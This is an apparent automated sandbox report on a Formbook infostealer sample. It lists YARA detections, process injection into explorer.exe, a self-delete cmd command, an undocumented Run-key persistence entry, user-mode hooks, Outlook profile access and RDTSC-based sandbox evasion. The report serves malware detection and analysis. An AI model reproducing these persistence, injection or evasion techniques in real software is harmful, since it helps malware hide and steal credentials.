          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048F20A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048F28EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048E1002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0483841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048ED466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04852581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048F25DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0483D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0482F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048F2D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04820D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04844120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048F1D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048F22AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048F2EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04846E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0485EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048EDBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048F1FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048F2B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0023E4F7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0023E4FA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00222D87
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00222D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00229E20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00222FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0482B150 appears 35 times
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: String function: 009FB150 appears 32 times
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: String function: 00406A94 appears 57 times
          Source: R6o4qCis6s.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: R6o4qCis6s.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: R6o4qCis6s.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: R6o4qCis6s.exe, 00000000.00000002.213709670.0000000002250000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs R6o4qCis6s.exe
          Source: R6o4qCis6s.exe, 00000001.00000002.257369887.0000000002ABE000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs R6o4qCis6s.exe
          Source: R6o4qCis6s.exe, 00000001.00000002.256353514.0000000000AEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs R6o4qCis6s.exe
          Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@6/2
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00421830 GetLastError,FormatMessageA,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00408E98 GetDiskFreeSpaceA,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_004146E8 FindResourceA,
          Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Roaming\55R0B44TJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.iniJump to behavior
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: R6o4qCis6s.exeVirustotal: Detection: 77%
          Source: R6o4qCis6s.exeReversingLabs: Detection: 79%
          Source: unknownProcess created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeProcess created: C:\Users\user\Desktop\R6o4qCis6s.exe 'C:\Users\user\Desktop\R6o4qCis6s.exe'
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\R6o4qCis6s.exe'
          Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Windows\SysWOW64\explorer.exeFile written: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.iniJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: explorer.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: R6o4qCis6s.exe, 00000001.00000002.256223988.00000000009D0000.00000040.00000001.sdmp, explorer.exe, 00000005.00000002.483146175.000000000491F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: R6o4qCis6s.exe, explorer.exe
          Source: Binary string: explorer.pdb source: R6o4qCis6s.exe, 00000001.00000002.256828041.0000000002770000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeUnpacked PE file: 1.2.R6o4qCis6s.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0046D730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00444B40 push 00444BCDh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00482040 push 00482066h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00472060 push 0047208Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00482008 push 00482034h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00474134 push 00474160h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0047C274 push 0047C2A0h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0046C22C push 0046C258h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0047C2C0 push 0047C2ECh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_004722F4 push 00472320h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0042A2B4 push 0042A2E0h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0040C340 push 0040C78Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_004703C0 push 004703ECh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0041E45C push 0041E502h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0046A48C push 0046A4B8h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00472498 push 004724C4h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00428550 push 0042857Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0043A524 push ecx; mov dword ptr [esp], ecx
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0046C5F4 push 0046C620h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_004705F4 push 00470620h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0047267C push 004726A8h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0040C610 push 0040C78Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_004066CA push 0040671Dh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_004066CC push 0040671Dh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_004286E8 push 00428714h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0047A7F8 push 0047A824h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0040C78E push 0040C7FFh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0040C790 push 0040C7FFh; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0047A798 push 0047A7C4h; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0041E860 push 0041E88Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0040C86E push 0040C89Ch; ret
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0040C870 push 0040C89Ch; ret

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\SysWOW64\explorer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 9RFXABXPJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE2
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0045880C PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00428920 IsIconic,GetWindowPlacement,GetWindowRect,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0043ED90 IsIconic,GetCapture,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0043F638 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00455888 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0046D730 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect sleep reduction / modificationsShow sources
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00433C54
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeRDTSC instruction interceptor: First address: 00000000004098D4 second address: 00000000004098DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeRDTSC instruction interceptor: First address: 0000000000409B3E second address: 0000000000409B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000002298D4 second address: 00000000002298DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000000229B3E second address: 0000000000229B44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc